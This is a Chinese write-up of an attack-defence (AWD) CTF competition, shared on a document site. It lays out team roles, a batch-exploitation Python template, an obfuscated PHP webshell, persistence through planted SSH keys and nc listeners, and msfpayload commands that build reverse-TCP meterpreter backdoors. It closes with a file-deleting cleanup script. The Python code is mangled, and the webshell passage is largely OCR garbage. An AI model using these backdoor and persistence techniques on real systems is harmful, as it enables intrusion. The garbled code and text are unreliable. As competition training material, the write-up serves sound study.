《awd攻防比赛总结材料.docx》由会员分享,可在线阅读,更多相关《awd攻防比赛总结材料.docx(7页珍藏版)》请在三一办公上搜索。
1、AWD攻防比赛总结3s_NwGeek最近参加了一场线下的awd攻防对抗赛,初次接触到这种模式,实在太有攻防的感觉了, 本次一共有三十多队。比赛一共有多个环境,有web和pwn的。本文着重讲web环境的个 人领会到的技巧和心得。首先我们目标是除了攻陷其他队维护的web服务器之外,并且还要修复自己服务器的漏 洞以防被别人拿下,把其他队服务器拿下后并提交根目录路径中的flag才能得分,10分钟 一回合刷新一次flag,每回合提交flag可以得分,服务器环境会自动抓数据包保存到本地 可以自己分析,被别人getshell提交自己服务器flag会扣分,服务宕掉也会扣分。所以总体的意思就是,要做的有挖洞,补
2、洞,溯源分析,还原攻击,可持续访问。每 10分钟就要攻击一次所有队伍的服务器,拿到flag,加分。但自己的服务器被攻陷,就要 扣分;服务无法运行,也要扣分。但实际上很可能大屏幕写着自己的服务被攻陷,自己都不 知道发生了什么事,怎么被打死的?为什么用同样的漏洞打回去不行?除此之外本次比赛还多了一些规则:1. 禁止对赛题服务发起任何形式的资源消耗型拒绝服务攻击;2. 禁止对赛题以外的比赛平台发起攻击,不能提权root,违者取消参赛资格;3. 禁止参赛战队使用通用防御方法,违者取消参赛资格。所以这里可以看出一些手段,如果没有特别说明,我们可以先把自己服务器提权,上通 用 waf。接下来是一些关键心得
3、与技巧:1. 一开局时,需要队员的配合,一位队员负责去web页面挖漏洞,一位队员把代码 download下来进行代码审计。最后一位队员负责先码好批量getshell的模板和批 量提交flag的模板,有这个对于比赛来说提高效率非常重要,也是决定胜利的关 键。(这里附上一个我自己写的批量漏洞利用模板,写了注释结合理解)#!/usr/bin/python2.7# -*- coding: UTF-8 -*-# made by 3s_NwGeekfrom gevent import monkeyfrom gevent.pool import Poolmonkey.patch_all()import sy
4、s#import os,time,requestsclass FILE:def _init_(self, FILEPATH):self.filepath=FILEPATHself.filename = (FILEPATH.split()-1)self.dirpath = FILEPATH.replace(self.filename,)def check(ip,port,Timeout=5):#检测函数,返回检测目标,检测结果 check_target=ip+:+str (port)# 测试192.121.102.11:25151try:#暗这里输入漏洞检测boc#pass#这里修改检测结果ch
5、eck_res = vul or no vul# 输出检测结果return check_target,check_resexcept Exception as e:return check_target, err:%s%str(e)def main(target):#输入处理ip,port= target.split(:)main_target,main_result = check(ip, port, 5)resultmain_target=main_resultif _name_ = _main_:#输入模块if len (sys.argv) leele this file nflvbt
6、cnujf- sELvtr dnwizt?- enphp . http* wbin F B .:祖5m注egm叩匡ALL氏加TTIT担如仁通WL 埴折耘瓯行的论 N+H土风催婴径炬羿点蚪作虹碓燧峭辐期胃H 益地仰暗者峭域肝 业应淅岬下程 淑Ells丽而U 楠舒?T SEEilfilW - ewlodeC0 丁,财t FoundsA0lienorjmrting / 4|3El/| 3S_uaer_id|/ICl 392p5ff7bOcB53d3ibHdcdEDi351c3b / D J: ,|D 31 Ci 2 D 3 |/ D Efl邛);挂缺仰唯段旅1 籍鬲X蜡M t! H 琵朋桔等蝴Em
7、1_SDIVER:酬问:土3垣!:* 1时:汨$_皿切|面甲。CCKn【$_EEEVE叫削、=11_801明珂可*|4_=【非;$ =S $_50快明0&卜团= 3_SERYEE(Qfl- xY. $_=$_:J_=i_.3_-+.3_-:3_-:i_-:*_:!_s_ -S_.5_ -S_ S_-S_ ?_ s_ 3_:S_-+:S_.-S_.S_ r二. =3_:S -S ;S -h-;S._- -_ r_f 厂t二厂二厂.=匚:卦E可血H口瓦:S_+* :S_+:: 3_+: g_R;弋 $. =$_: 3: 3. i s *+:H:&_f s_+-; S_tt3 -+*73 -s fa
8、; W 吕 iSF:?/-一 一_一+:s_+*:.-s_: 44: $_:m5_H: s_+-. S_+: S+:S_+:+:3 1-_*+;3_*+;3j -f寻 -r m TT-jS TT g T T Q TT - Q TT -日 -f-f- - j TT - j- j + - jj -+ g F+:s_*+: $_ ;: $_i: $_1赢_二1_项_-_17|_二3_13_丘$_: JiJTFLMw+TI+;S_+;s_+t;S_+:S_+;s_t+ ;S_+:s_+t;5_t+ ;?_+:?. -s_;s_-s S S_+-;s +- S t+;s_tt;s_ft;福7$ 丁7$
9、寻 二7$ 二 f。了 7不 71=# 二T 电:U &麻h KMFTBi)Twiws 迎抵!?;(简单混淆后还是可以连上的php T)然后抓取到获取flag的数据包就可以写批量拿flag的脚本了。4. 有些队伍可能比较关注http流量,很大几率我们的webshell被发现,可以使用多种可持续访问的方式进行维持拿flag得分,比如说上传一个ssh密钥上传到 目标服务器上可以实现ssh免密码登陆,或者可以nc开端口进行监听,(后门注入 到进程的权限要求可能比较高,而且比赛要求不能提权)。SSH免密码登陆的过程:首先在自己主机上生成公钥私钥,将公钥通过webshell传到目标主机上,要 重命名成a
10、uthorized_keys,然后我们主机向目标主机发送一个ssh连接请求。目 标主机得到我们主机的信息后,在authorized_key中查找,如果有相应的用户名, 则随机生成一个字符串,并用我们主机的公钥加密,发送给我们主机。我们主机得 到目标主机发来的消息后,使用私钥进行解密,然后将解密后的字符串发送给目标 主机。目标主机进行和生成的对比,如果一致,则允许免登录。附上其他一些可持续访问的方式:Windows生成后门:msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= X shell.exelinux生成后门:msfpayloa
11、d linux/x86/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t elf -o shell5. 简单防御的方法:除了修复代码外还可以在服务器部署文件监控的脚本,这样能快速找到新增的木马或者哪些页面被修改过,或者可以设置文件属性不能修改。 附上一个windows下的批处理脚本参考:REM writed by 3s_Nwgeekecho off&Setlocal enabledelayedexpansionREM指定路径cd /d C:UsersDesktop1:cleanwebshellfor /r . %a in (*) do
12、 (REM指定时间if %ta gtr 2018/06/19 21:41 echo had been delete %a)ping nullnullnull -n 1 nulgoto :cleanwebshell注意:更改时间,此脚本会删除该时间后增加修改的文件(如果有bug不能删除文件,一定是系统时间格式不对,注意更改)6. 总结:当后门持续隐藏得越久,分值拿得越多,除了上传漏洞,还可以尝试弱口令、对应cms RCE漏洞进行getshell,方法思路不要太固定太套路。本次比赛获 益良多,知道了自己很多方面的知识还要补充,见识到了各路神仙打架是怎样的, 这种模式和普通的ctf做题模式不一样,初次接触,有不对或者能改进的地方多多 指教。7.
